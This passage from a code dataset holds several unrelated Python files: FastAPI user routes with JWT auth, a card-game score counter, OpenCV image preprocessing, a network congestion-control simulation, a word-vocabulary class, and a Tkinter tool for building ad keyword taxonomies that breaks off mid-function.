revoked.\"}\n\n@router.delete('/refresh-token-revoke')\nasync def refresh_token_revoke(Authorize: AuthJWT = Depends()):\n Authorize.jwt_refresh_token_required()\n\n jti = Authorize.get_raw_jwt()['jti']\n conn_redis.setex(jti,REFRESH_EXPIRES,\"true\")\n return {\"message\":\"Refresh token revoked.\"}\n\n@router.get('/me', response_model=UserOut)\nasync def get_my_user(Authorize: AuthJWT = Depends()):\n Authorize.jwt_required()\n\n user_id = Authorize.get_jwt_identity()\n return await UserFetch.filter_by_id(id=user_id)\n\n@router.get('/', response_model=List[UserOut])\nasync def all_user():\n return await UserFetch.all_user()\n\n@router.put('/update')\nasync def update_user(user: UserUpdate, Authorize: AuthJWT = Depends()):\n Authorize.fresh_jwt_required()\n\n user_id = Authorize.get_jwt_identity()\n await UserCrud.update_user(user_id=user_id,**user.dict())\n return {\"message\": \"Success update your account.\"}\n\n@router.delete('/{user_id}')\nasync def delete_user(user_id: int):\n await UserCrud.delete_user(user_id=user_id)\n return {\"message\": \"Success delete user.\"}\n","sub_path":"examples/multiple_files/services/routers/Users.py","file_name":"Users.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"304011625","text":"import os\nimport sys\n\nROOTDIR = (\n os.path.dirname(\n os.path.dirname(\n os.path.abspath(__file__)\n)))\n\nsys.path = [ROOTDIR] + sys.path\n\nimport LostCitiesScore.scorecounter as counter\n\n\n\n\ndef main():\n player_one = 0\n player_two = 0\n\n rounds = range(1, 4)\n\n for rnd in rounds:\n print()\n print('.'*79)\n print('Round: {}'.format(rnd))\n\n scoretext = input('\\tPlayer 1 cards: ')\n roundscore = counter.PlayerRows(text=scoretext).value\n player_one += roundscore\n print('\\t round score: {}'.format(roundscore))\n print('\\t total score: {}'.format(player_one))\n\n print()\n\n scoretext = input('\\tPlayer 2 cards: ')\n roundscore = counter.PlayerRows(text=scoretext).value\n player_two += roundscore\n print('\\t round score: {}'.format(roundscore))\n print('\\t total score: {}'.format(player_two))\n\n print('\\tscore diff: {}'.format(abs(player_two-player_one)))\n\n print()\n print('-'*79)\n print('Total:')\n print('player one total: {}'.format(player_one))\n print('player two total: {}'.format(player_two))\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"LostCitiesScore/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"152149690","text":"# Preprocess.py\n\nimport cv2\nimport numpy as np\nimport math\nimport Main\n# module level variables ##########################################################################\nGAUSSIAN_SMOOTH_FILTER_SIZE = (5, 5)\nADAPTIVE_THRESH_BLOCK_SIZE = 19\nADAPTIVE_THRESH_WEIGHT = 9\n\n###################################################################################################\ndef preprocess(imgOriginal):\n imgGrayscale = extractValue(imgOriginal) # We get the gray scale of the image.\n #imgGrayscale = cv2.equalizeHist(imgGrayscale)\n imgMaxContrastGrayscale = maximizeContrast(imgGrayscale) # contrast is the difference between light and dark in an image. High contrast images will have bright highlights and dark shadows,bold colours, and show texture in the subject. 
Low contrast images will have a narrow range of tones and might therefore feel flat or dull\n height,width = imgGrayscale.shape\n imgBlurred = np.zeros((height, width, 1), np.uint8)\n\n imgBlurred = cv2.GaussianBlur(imgMaxContrastGrayscale, GAUSSIAN_SMOOTH_FILTER_SIZE, 0) # 2nd parameter is (height,width) of Gaussian kernel,3rd parameter is sigmaX,4th parameter is sigmaY(as not specified it is made same as sigmaX).\n \n imgThresh = cv2.adaptiveThreshold(imgBlurred, 255.0, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, ADAPTIVE_THRESH_BLOCK_SIZE, ADAPTIVE_THRESH_WEIGHT)\n \n return imgGrayscale, imgThresh\n\n###################################################################################################\ndef extractValue(imgOriginal):\n height, width, numChannels = imgOriginal.shape\n\n imgHSV = np.zeros((height, width, 3), np.uint8)\n\n imgHSV = cv2.cvtColor(imgOriginal, cv2.COLOR_BGR2HSV)\n\n imgHue, imgSaturation, imgValue = cv2.split(imgHSV)\n\n return imgValue\n\n###################################################################################################\ndef maximizeContrast(imgGrayscale):\n\n height, width = imgGrayscale.shape\n\n imgTopHat = np.zeros((height, width, 1), np.uint8)\n imgBlackHat = np.zeros((height, width, 1), np.uint8)\n\n structuringElement = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3)) # Same as np.ones((3,3)\n\n imgTopHat = cv2.morphologyEx(imgGrayscale, cv2.MORPH_TOPHAT, structuringElement) # It is difference of input image and Opening of the image\n imgBlackHat = cv2.morphologyEx(imgGrayscale, cv2.MORPH_BLACKHAT, structuringElement) # it is difference of closing of the input image and input image.\n\n imgGrayscalePlusTopHat = cv2.add(imgGrayscale, imgTopHat)\n imgGrayscalePlusTopHatMinusBlackHat = cv2.subtract(imgGrayscalePlusTopHat, imgBlackHat)\n\n return imgGrayscalePlusTopHatMinusBlackHat\n","sub_path":"Main Program/Preprocess.py","file_name":"Preprocess.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"16912974","text":"# Copyright 2019 Nathan Jay and Noga Rotman\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport random\n\nimport gym\nimport os\nimport sys\nimport inspect\nfrom tqdm import tqdm\nimport numpy as np\n\n\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparentdir = os.path.dirname(currentdir)\npparentdir = os.path.dirname(parentdir)\nsys.path.insert(0,pparentdir)\n\nfrom src.gym.simulate_network.link import Link\nfrom src.gym.simulate_network.network import Network\nfrom src.gym.simulate_network.sender import Sender\n\nfrom src.gym.simulate_network.simulated_network_env import SimulatedNetworkEnv\nfrom src.gym.no_regret_policy.gradient_calculating_agent import GradientCalculatingAgent\n\nimport src.gym.simulate_network.single_sender_network\nfrom src.common.simple_arg_parse import arg_or_default\nfrom src.gym.no_regret_policy.no_regret_policy import NoRegretAgent\nfrom 
src.gym.aurora_policy.aurora_policy import AuroraPolicy\nfrom src.gym.no_regret_policy.no_regret_combining_policy import NoRegretCombiningPolicy\n\nhistory_len = 10\nfeatures = \"sent latency inflation,\" + \"latency ratio,\" + \"send ratio\"\n\nbws = [100, 240] # [200, 300, 200, 300]\nindex = 0\n\ndef get_network():\n global index\n\n while True:\n link1 = Link.generate_link(bws[index], 0.2, 6, 0)\n links = [link1]\n\n yield links\n index = 1 - index\n\nsenders = [\n Sender(\n random.uniform(0.3, 1.5) * bws[0],\n None, 0, features.split(\",\"),\n history_len=history_len\n )\n]\n\nimport matplotlib.pyplot as plt\n\nenv = SimulatedNetworkEnv(senders, get_network(), history_len=history_len, features=features)\nmodel = NoRegretCombiningPolicy(\n AuroraPolicy(\"./rand_model_12\", env),\n NoRegretAgent(GradientCalculatingAgent(actions_limits=(40, 300), C=11 * 300, L=2))\n)\n\n#time_data = [float(event[\"Time\"]) for event in data[\"Events\"][1:]]\n#rew_data = [float(event[\"Reward\"]) for event in data[\"Events\"][1:]]\n#optimal_data = [float(event[\"Optimal\"]) for event in data[\"Optimal\"][1:]]\n#send_data = [float(event[\"Send Rate\"]) for event in data[\"Events\"][1:]]\n\n\nTIMES = 10000\n\npbar = tqdm(total=TIMES / 100)\n\nobs = env.reset()\nrewards = [0, 0]\nfor i in range(TIMES):\n #env.senders[0].set_rate(40)\n action = model.predict(obs[0], rewards[0])\n env.senders[0].set_rate(action)\n\n #action = model2.predict(obs[0], rewards[0])\n #env.senders[1].set_rate(action)\n #env.senders[0].set_rate(int(250-i/2000*250))\n #env.senders[0].set_rate(i / 5000 * 220)\n #env.senders[0].set_rate(210)\n # print(\"Sending rate %d Reward %f\" % (env.senders[0].rate, rewards[0]))\n obs, rewards, dones, info = env.step([0])\n\n # if i > 0 and i % 400 == 0:\n # event = info[0][\"Events\"][-1]\n # obs = env.reset()\n # times = [event[\"Time\"] for event in info[0][\"Events\"][-501:]]\n # send = [event[\"Send Rate\"] for event in info[0][\"Events\"][-500:]]\n # throu = [event[\"Throughput\"] for event in info[0][\"Events\"][-500:]]\n # optim = [8*event[\"Optimal\"] for event in info[0][\"Events\"][-501:]]\n # plt.plot(times[:500], throu, \"g.\", label=\"Throughput\")\n # plt.plot(times[:500], send, \"r.\", label=\"Send rate\")\n # plt.plot(times, optim, \"b--\", label=\"Optimal\")\n # plt.draw()\n # plt.pause(0.01)\n #\n # for sender in env.senders:\n # sender.reset_events()\n\n #if i > 0 and i % 5500 == 0:\n # model.faster_learning_rate()\n\n if i > 0 and i % 2000 == 0:\n obs = env.reset(True)\n\n\n env.render()\n\n if i % 100 == 0:\n pbar.update(1)\n\n\nfig, ax = plt.subplots(nrows=3, ncols=2)\n\ntimes = [event[\"Time\"] for event in info[0][\"Events\"]]\nsend = [event[\"Send Rate\"] for event in info[0][\"Events\"]]\nthrou = [event[\"Throughput\"] for event in info[0][\"Events\"]]\noptim = [8*event[\"Optimal\"] for event in info[0][\"Events\"]]\nlatency = [event[\"Latency Gradient\"] for event in info[0][\"Events\"]]\nlat = [event[\"Latency\"] for event in info[0][\"Events\"]]\nloss = [event[\"Loss Rate\"] for event in info[0][\"Events\"]]\nreward = [event[\"Reward\"] for event in info[0][\"Events\"]]\nax[0][0].title.set_text(\"Sending rate\")\nax[0][0].plot(times, throu, \"g.\", label=\"Throughput\")\nax[0][0].plot(times, send, \"r-\", label=\"Send rate\")\nax[0][0].plot(times, optim, \"b--\", label=\"Optimal\")\nax[0][0].legend()\nax[0][0].grid()\n\nax[0][1].title.set_text(\"Latency Gradient\")\nax[0][1].plot(times, latency, \"r.\", label=\"Latency 
Gradient\")\nax[0][1].legend()\nax[0][1].grid()\n\nax[1][0].title.set_text(\"Reward\")\nax[1][0].plot(times, reward, \"b.\", label=\"Reward\")\nax[1][0].legend()\nax[1][0].grid()\n\nax[1][1].title.set_text(\"Loss\")\nax[1][1].plot(times, loss, \"g.\", label=\"Loss\")\nax[1][1].legend()\nax[1][1].grid()\n\nax[2][0].title.set_text(\"Latency\")\nax[2][0].plot(times, lat, \"b.\", label=\"Latency\")\nax[2][0].plot(times, np.ones(len(times)) * env.net.links[0].delay, \"r--\", label=\"Link latency\")\nax[2][0].legend()\nax[2][0].grid()\n\nplt.show()\n","sub_path":"src/gym/test_comb.py","file_name":"test_comb.py","file_ext":"py","file_size_in_byte":5419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"512398027","text":"import re\n\n\n\nclass vocabulary(object):\n\n def __init__(self,w = 3):\n self.window = w\n self.vindex = 0\n self.vlook = []\n self.vocab = []\n\n self.aword = re.compile(r'(\\b(\\w|\\.)+\\b)|!|\\?|\\.+',re.LOCALE)\n self.apunc = re.compile(r'!|\\?|\\.+',re.LOCALE)\n self.documents = []\n\n def numword(self,n):\n if n == -1:return ''\n return self.vlook[n]\n\n def wordnum(self,w):\n for x in range(self.vindex):\n if self.vlook[x] == w:\n return self.vocab[x]\n self.vlook.append(w)\n self.vocab.append(self.vindex)\n self.vindex += 1\n return self.vindex-1\n\n # return a list of context windows around each of a sequence of words\n def contextwindow(self,words):\n assert (self.window % 2) == 1\n assert self.window >= 1\n wordspadded = self.window//2*[-1] + words + self.window//2*[-1]\n out = [wordspadded[i:i+self.window] for i in range(len(words))]\n assert len(out) == len(words)\n return out\n\n # cache a text document for later processing\n def consume_document(self,doc):\n words = self.aword.finditer(doc)\n numwords = [self.wordnum(w.group(0)) for w in words]\n #allwords = [self.numword(n) for n in numwords]\n numwordcontexts = self.contextwindow(numwords)\n self.documents.append(numwordcontexts)\n return numwordcontexts\n\n\n\n","sub_path":"src/nnets/aiobrain/language.py","file_name":"language.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"182464870","text":"import tkinter as tk\r\nfrom tkinter import IntVar\r\nfrom openpyxl import Workbook\r\n\r\nroot= tk.Tk()\r\n\r\ncanvas1 = tk.Canvas(root, width = 1800, height = 800)\r\ncanvas1.pack()\r\n\r\n\r\n\r\n\r\n\r\n\r\nkeywords = tk.Entry (root) \r\nbranded_words = tk.Entry (root) \r\n#brand\r\ntactic_type = tk.Entry (root)\r\ntier = tk.Entry (root)\r\ncorp_non = tk.Entry (root)\r\nlob = tk.Entry (root)\r\nintiative = tk.Entry (root)\r\n#match_type\r\nregion = tk.Entry (root)\r\nmarket = tk.Entry (root)\r\nsub_region = tk.Entry (root)\r\nlanguage = tk.Entry (root)\r\ndevice = tk.Entry (root)\r\n\r\ntopic = tk.Entry(root)\r\n\r\nurl_google = tk.Entry (root)\r\nurl_bing = tk.Entry (root)\r\n\r\nurl_g_aw = tk.Entry (root)\r\nurl_g_it = tk.Entry (root)\r\nurl_g_co = tk.Entry (root)\r\nurl_g_ev = tk.Entry (root)\r\n\r\nurl_b_aw = tk.Entry (root)\r\nurl_b_it = tk.Entry (root)\r\nurl_b_co = tk.Entry (root)\r\nurl_b_ev = tk.Entry (root)\r\n\r\n#cj_stages\r\n\r\ncanvas1.create_window(100, 140, window=keywords)\r\ncanvas1.create_window(350, 140, window=branded_words)\r\ncanvas1.create_window(250, 240, window=tactic_type)\r\ncanvas1.create_window(400, 240, window=tier)\r\ncanvas1.create_window(550, 240, window=corp_non)\r\ncanvas1.create_window(700, 240, 
window=lob)\r\ncanvas1.create_window(850, 240, window=intiative)\r\ncanvas1.create_window(1000, 240, window=region)\r\ncanvas1.create_window(1150, 240, window=market)\r\ncanvas1.create_window(1300, 240, window=sub_region)\r\ncanvas1.create_window(1450, 240, window=language)\r\ncanvas1.create_window(1600, 240, window=device)\r\ncanvas1.create_window(600, 140, window=topic)\r\ncanvas1.create_window(100, 340, window=url_google)\r\ncanvas1.create_window(250, 340, window=url_bing)\r\n\r\ncanvas1.create_window(700, 440, window=url_g_aw)\r\ncanvas1.create_window(850, 440, window=url_b_aw)\r\ncanvas1.create_window(700, 540, window=url_g_it)\r\ncanvas1.create_window(850, 540, window=url_b_it)\r\ncanvas1.create_window(700, 640, window=url_g_co)\r\ncanvas1.create_window(850, 640, window=url_b_co)\r\ncanvas1.create_window(700, 740, window=url_g_ev)\r\ncanvas1.create_window(850, 740, window=url_b_ev)\r\n\r\n\r\nkeyword_label = tk.Label(root, text='Keywords with \"/\" delimintor')\r\nbranded_words_label = tk.Label(root, text='Branded Words with \"/\" delimintor')\r\ntactic_type_label = tk.Label(root, text='AW/DG')\r\ntier_label = tk.Label(root, text='Tier')\r\ncorp_non_label = tk.Label(root, text='Corp/Non-Corp')\r\nlob_label = tk.Label(root, text='L.O.B')\r\nintiative_label = tk.Label(root, text='Intitative')\r\nregion_label = tk.Label(root, text='Region')\r\nmarket_label = tk.Label(root, text='Market')\r\nsub_region_label = tk.Label(root, text='Sub Region')\r\nlanguage_label = tk.Label(root, text='Language')\r\ndevice_label = tk.Label(root, text='Device')\r\ntopic_label = tk.Label(root, text='Topic')\r\nurl_google_label = tk.Label(root, text='URL Google')\r\nurl_bing_label = tk.Label(root, text='URL Bing')\r\n\r\ncj_url_labels = tk.Label(root, text='URLS for CJ stage')\r\ngoogle_label = tk.Label(root, text='Google')\r\nbing_label = tk.Label(root, text='Bing')\r\naw_label = tk.Label(root, text='AW')\r\nit_label = tk.Label(root, text='IT')\r\nco_label = tk.Label(root, text='CO')\r\nev_label = tk.Label(root, text='EV')\r\n\r\n\r\n\r\n\r\ncanvas1.create_window(100, 100, window=keyword_label)\r\ncanvas1.create_window(350, 100, window=branded_words_label)\r\ncanvas1.create_window(600, 100, window=topic_label)\r\ncanvas1.create_window(250, 200, window=tactic_type_label)\r\ncanvas1.create_window(400, 200, window=tier_label)\r\ncanvas1.create_window(550, 200, window=corp_non_label)\r\ncanvas1.create_window(700, 200, window=lob_label)\r\ncanvas1.create_window(850, 200, window=intiative_label)\r\ncanvas1.create_window(1000, 200, window=region_label)\r\ncanvas1.create_window(1150, 200, window=market_label)\r\ncanvas1.create_window(1300, 200, window=sub_region_label)\r\ncanvas1.create_window(1450, 200, window=language_label)\r\ncanvas1.create_window(1600, 200, window=device_label)\r\ncanvas1.create_window(100, 300, window=url_google_label)\r\ncanvas1.create_window(220, 300, window=url_bing_label)\r\n\r\ncanvas1.create_window(770, 380, window=cj_url_labels)\r\ncanvas1.create_window(700, 410, window=google_label)\r\ncanvas1.create_window(840, 410, window=bing_label)\r\n\r\ncanvas1.create_window(600, 440, window=aw_label)\r\ncanvas1.create_window(600, 540, window=it_label)\r\ncanvas1.create_window(600, 640, window=co_label)\r\ncanvas1.create_window(600, 740, window=ev_label)\r\n\r\nv = IntVar()\r\nv.set(1)\r\n\r\ntk.Radiobutton(root, text=\"Consumer Journey\", variable=v, value=1).pack(anchor='w')\r\ntk.Radiobutton(root, text=\"Consumer Journey - No Stage\", variable=v, 
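\r\n# v (an IntVar) carries the selected build mode, read back via v.get() in\r\n# taxonomyBuild()/createBuild(): 1 = Consumer Journey, 2 = Consumer Journey\r\n# without CJ stages, 3 = Audience Pilot\r\n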
value=2).pack(anchor='w')\r\ntk.Radiobutton(root, text=\"Audiance Pilot\", variable=v, value=3).pack(anchor='w')\r\n\r\n\r\ndef getInfo (): \r\n build_keyword = keywords.get()\r\n build_branded_words = branded_words.get()\r\n build_keyword_split = build_keyword.split('/')\r\n build_branded_words_split = build_branded_words.split('/')\r\n\r\n build_tactic_type = tactic_type.get().upper()\r\n build_tier= 'T' + tier.get()\r\n build_corp_non = corp_non.get()\r\n build_lob = lob.get()\r\n build_initative = intiative.get()\r\n build_region = region.get().upper()\r\n build_market = market.get().upper()\r\n build_sub_region = market.get()\r\n build_language = language.get().upper()\r\n build_device = device.get()\r\n build_topic = topic.get()\r\n build_url_google = url_google.get()\r\n build_url_bing = url_bing.get()\r\n \r\n return build_keyword_split, build_branded_words_split, build_tactic_type, build_tier, build_corp_non, build_lob, build_initative, build_region, build_market, build_sub_region, build_language, build_device, build_topic, build_url_google, build_url_bing\r\n \r\ndef get_cj_URLS():\r\n aw_url_g = url_g_aw.get()\r\n aw_url_b = url_b_aw.get()\r\n it_url_g = url_g_it.get()\r\n it_url_b = url_b_it.get()\r\n co_url_g = url_g_co.get()\r\n co_url_b = url_b_co.get()\r\n ev_url_g = url_g_ev.get()\r\n ev_url_b = url_b_ev.get()\r\n \r\n return aw_url_g, aw_url_b, it_url_g, it_url_b, co_url_g, co_url_b, ev_url_g, ev_url_b\r\n\r\n\r\ndef taxonomyBuild():\r\n info = getInfo()\r\n radio = v.get()\r\n br = 'BR_'\r\n ub = 'UB_'\r\n broad = '_Broad_'\r\n exact = '_Exact_'\r\n campaign_br_broad = br +'_'.join(info[2:6]) + broad + '_'.join(info[7:-3])\r\n campaign_br_exact = br +'_'.join(info[2:6]) + exact + '_'.join(info[7:-3])\r\n campaign_ub_broad = ub +'_'.join(info[2:6]) + broad + '_'.join(info[7:-3])\r\n campaign_ub_exact = ub +'_'.join(info[2:6]) + exact + '_'.join(info[7:-3])\r\n if radio == 3:\r\n hiq = '_HIQ_'\r\n miq = '_MIQ_'\r\n unk = '_UNK_'\r\n adgroup_br_broad_HIQ = br + '_' + str(info[5]) + '_' + str(info[2]) + hiq + broad + str(info[7]) + '_' + str(info[10])\r\n adgroup_br_broad_MIQ = br + '_' + str(info[5]) + '_' + str(info[2]) + miq + broad + str(info[7]) + '_' + str(info[10])\r\n adgroup_br_broad_UNK = br + '_' + str(info[5]) + '_' + str(info[2]) + unk + broad + str(info[7]) + '_' + str(info[10])\r\n\r\n adgroup_br_exact_HIQ = br + '_' + str(info[5]) + '_' + str(info[2]) + hiq + exact + str(info[7]) + '_' + str(info[10])\r\n adgroup_br_exact_MIQ = br + '_' + str(info[5]) + '_' + str(info[2]) + miq + exact + str(info[7]) + '_' + str(info[10])\r\n adgroup_br_exact_UNK = br + '_' + str(info[5]) + '_' + str(info[2]) + unk + exact + str(info[7]) + '_' + str(info[10])\r\n\r\n adgroup_ub_broad_HIQ = ub + '_' + str(info[5]) + '_' + str(info[2]) + hiq + broad + str(info[7]) + '_' + str(info[10])\r\n adgroup_ub_broad_MIQ = ub + '_' + str(info[5]) + '_' + str(info[2]) + miq + broad + str(info[7]) + '_' + str(info[10])\r\n adgroup_ub_broad_UNK = ub + '_' + str(info[5]) + '_' + str(info[2]) + unk + broad + str(info[7]) + '_' + str(info[10])\r\n\r\n adgroup_ub_exact_HIQ = ub + '_' + str(info[5]) + '_' + str(info[2]) + hiq + exact + str(info[7]) + '_' + str(info[10])\r\n adgroup_ub_exact_MIQ = ub + '_' + str(info[5]) + '_' + str(info[2]) + miq + exact + str(info[7]) + '_' + str(info[10])\r\n adgroup_ub_exact_UNK = ub + '_' + str(info[5]) + '_' + str(info[2]) + unk + exact + str(info[7]) + '_' + str(info[10])\r\n\r\n return campaign_br_broad, campaign_br_exact, campaign_ub_broad, 
campaign_ub_exact, adgroup_br_broad_HIQ, adgroup_br_broad_MIQ, adgroup_br_broad_UNK, adgroup_br_exact_HIQ, adgroup_br_exact_MIQ, adgroup_br_exact_UNK, adgroup_ub_broad_HIQ,adgroup_ub_broad_MIQ, adgroup_ub_broad_UNK, adgroup_ub_exact_HIQ,adgroup_ub_exact_MIQ, adgroup_ub_exact_UNK\r\n elif radio == 1:\r\n aw = '_AW'\r\n it = '_IT'\r\n co = '_CO'\r\n ev = '_EV'\r\n adgroup_br_broad_AW = br + str(info[6]) + '_' + str(info[-3]) +aw +broad + str(info[-5])\r\n adgroup_br_broad_IT = br + str(info[6]) + '_' + str(info[-3]) +it +broad + str(info[-5])\r\n adgroup_br_broad_CO = br + str(info[6]) + '_' + str(info[-3]) +co +broad + str(info[-5])\r\n adgroup_br_broad_EV = br + str(info[6]) + '_' + str(info[-3]) +ev +broad + str(info[-5])\r\n\r\n adgroup_br_exact_AW = br + str(info[6]) + '_' + str(info[-3]) +aw +exact + str(info[-5])\r\n adgroup_br_exact_IT = br + str(info[6]) + '_' + str(info[-3]) +it +exact + str(info[-5])\r\n adgroup_br_exact_CO = br + str(info[6]) + '_' + str(info[-3]) +co +exact + str(info[-5])\r\n adgroup_br_exact_EV = br + str(info[6]) + '_' + str(info[-3]) +ev +exact + str(info[-5])\r\n\r\n adgroup_ub_broad_AW = ub + str(info[6]) + '_' + str(info[-3]) +aw +broad + str(info[-5])\r\n adgroup_ub_broad_IT = ub + str(info[6]) + '_' + str(info[-3]) +it +broad + str(info[-5])\r\n adgroup_ub_broad_CO = ub + str(info[6]) + '_' + str(info[-3]) +co +broad + str(info[-5])\r\n adgroup_ub_broad_EV = ub + str(info[6]) + '_' + str(info[-3]) +ev +broad + str(info[-5])\r\n\r\n adgroup_ub_exact_AW = ub + str(info[6]) + '_' + str(info[-3]) +aw +exact + str(info[-5])\r\n adgroup_ub_exact_IT = ub + str(info[6]) + '_' + str(info[-3]) +it +exact + str(info[-5])\r\n adgroup_ub_exact_CO = ub + str(info[6]) + '_' + str(info[-3]) +co +exact + str(info[-5])\r\n adgroup_ub_exact_EV = ub + str(info[6]) + '_' + str(info[-3]) +ev +exact + str(info[-5])\r\n\r\n return campaign_br_broad, campaign_br_exact, campaign_ub_broad, campaign_ub_exact, adgroup_br_broad_AW, adgroup_ub_broad_AW, adgroup_br_exact_AW, adgroup_ub_exact_AW, adgroup_br_broad_IT, adgroup_ub_broad_IT, adgroup_br_exact_IT, adgroup_ub_exact_IT, adgroup_br_broad_CO, adgroup_ub_broad_CO, adgroup_br_exact_CO, adgroup_ub_exact_CO, adgroup_br_broad_EV, adgroup_ub_broad_EV, adgroup_br_exact_EV, adgroup_ub_exact_EV\r\n\r\n\r\n else:\r\n adgroup_br_broad = br + str(info[6]) + '_' + str(info[-3]) +broad + str(info[-5])\r\n adgroup_br_exact = br + str(info[6]) + '_' + str(info[-3]) +exact + str(info[-5])\r\n adgroup_ub_broad = ub + str(info[6]) + '_' + str(info[-3]) +broad + str(info[-5])\r\n adgroup_ub_exact = ub + str(info[6]) + '_' + str(info[-3]) +exact + str(info[-5])\r\n\r\n return campaign_br_broad, campaign_br_exact, campaign_ub_broad, campaign_ub_exact, adgroup_br_broad, adgroup_br_exact, adgroup_ub_broad, adgroup_ub_exact\r\n\r\ndef createBuild():\r\n taxonomy = taxonomyBuild()\r\n info = getInfo()\r\n urls = get_cj_URLS()\r\n\r\n wb = Workbook()\r\n ws = wb.active\r\n radio = v.get()\r\n if radio == 1:\r\n #root words\r\n pre_rootword_what ='What'\r\n pre_rootword_how ='How'\r\n pre_rootword_explain ='Explain'\r\n pre_rootword_best ='Best'\r\n pre_rootword_top ='Top'\r\n pre_rootword_compare ='Compare'\r\n pre_rootword_try ='Try'\r\n post_rootword_explained ='Explained'\r\n post_rootword_examples ='Examples'\r\n post_rootword_sources ='Sources'\r\n post_rootword_versus ='Versus'\r\n post_rootword_review ='Review'\r\n post_rootword_trial ='Trial'\r\n post_rootword_demo ='Demo'\r\n\r\n #create list permutations from rootwords and 
user generated keywords\r\n #Awareness\r\n Awareness_perm_what = [pre_rootword_what + ' ' + x for x in info[0]]\r\n Awareness_perm_how = [pre_rootword_how + ' ' + x for x in info[0]]\r\n Awareness_perm_explain = [pre_rootword_explain + ' ' + x for x in info[0]]\r\n Awareness_perm_explained = [x + ' ' + post_rootword_explained for x in info[0]]\r\n #Interest\r\n Interest_perm_best = [pre_rootword_best + ' ' + x for x in info[0]]\r\n Interest_perm_top = [pre_rootword_top + ' ' + x for x in info[0]]\r\n Interest_perm_examples = [x + ' ' + post_rootword_examples for x in info[0]]\r\n Interest_perm_sources = [x + ' ' + post_rootword_sources for x in info[0]]\r\n #Consideration\r\n Consideration_perm_compare = [pre_rootword_compare + ' ' + x for x in info[0]]\r\n Consideration_perm_versus = [x + ' ' + post_rootword_versus for x in info[0]]\r\n Consideration_perm_review = [x + ' ' + post_rootword_review for x in info[0]]\r\n #Evaluation\r\n Evaluation_perm_try = [pre_rootword_try + ' ' + x for x in info[0]]\r\n Evaluation_perm_trial = [x + ' ' + post_rootword_trial for x in info[0]]\r\n Evaluation_perm_demo = [x + ' ' + post_rootword_demo for x in info[0]]\r\n\r\n #Grouping by Stage\r\n Awareness = Awareness_perm_what + Awareness_perm_how + Awareness_perm_explain + Awareness_perm_explained\r\n Interest = Interest_perm_best + Interest_perm_top + Interest_perm_examples + Interest_perm_sources\r\n Consideration = Consideration_perm_compare + Consideration_perm_versus + Consideration_perm_review\r\n Evaluation = Evaluation_perm_try + Evaluation_perm_trial + Evaluation_perm_demo\r\n\r\n #creates broad match keywords\r\n Awareness_broad_1 = [\"+\" + suit for suit in Awareness]\r\n Awareness_broad_2 = [x.replace(' ',' +') for x in Awareness_broad_1]\r\n Awareness = Awareness + Awareness_broad_2\r\n Interest_broad_1= [\"+\" + suit for suit in Interest]\r\n Interest_broad_2 = [x.replace(' ',' +') for x in Interest_broad_1]\r\n Interest = Interest + Interest_broad_2\r\n Consideration_broad_1 = [\"+\" + suit for suit in Consideration]\r\n Consideration_broad_2 = [x.replace(' ', ' +') for x in Consideration_broad_1]\r\n Consideration = Consideration + Consideration_broad_2\r\n Evaluation_broad_1 = [\"+\" + suit for suit in Evaluation]\r\n Evaluation_broad_2 = [x.replace(' ', ' +') for x in Evaluation_broad_1]\r\n Evaluation = Evaluation + Evaluation_broad_2\r\n consumer_journey_stages =[Awareness,Interest, Consideration, Evaluation]\r\n \r\n\r\n #create worksheets\r\n \r\n ws1 = ws.title = \"Awareness\"\r\n ws2 = wb.create_sheet(\"Interest\",1)\r\n ws3 = wb.create_sheet(\"Consideration\",2)\r\n ws4 = wb.create_sheet(\"Evaluation\",3)\r\n def column_title(worksheet_name):\r\n for ws in wb:\r\n ws['A1'] = 'Campaign'\r\n ws['B1'] = 'Ad Group'\r\n ws['C1'] = 'Keyword'\r\n ws['D1'] = 'Match Type'\r\n ws['E1'] = 'Max CPC'\r\n ws['F1'] = 'Final URL Google'\r\n ws['G1'] = 'Final URL Bing'\r\n ws['H1'] = 'BN/UB'\r\n\r\n #name each column\r\n column_title(wb[\"Awareness\"])\r\n column_title(wb[\"Interest\"])\r\n column_title(wb[\"Consideration\"])\r\n column_title(wb[\"Evaluation\"])\r\n\r\n #keyword fill function\r\n def kfill(worksheet_name, journey_stage):\r\n ws = worksheet_name \r\n r=2\r\n for word in journey_stage:\r\n ws.cell(row=r, column=3).value = word\r\n r+=1\r\n\r\n \r\n #fill keyword sett to column\r\n kfill(wb[\"Awareness\"], Awareness)\r\n kfill(wb[\"Interest\"], Interest)\r\n kfill(wb[\"Consideration\"], Consideration)\r\n kfill(wb[\"Evaluation\"], Evaluation)\r\n\r\n #match type/Max CPC/BN/UB fill 
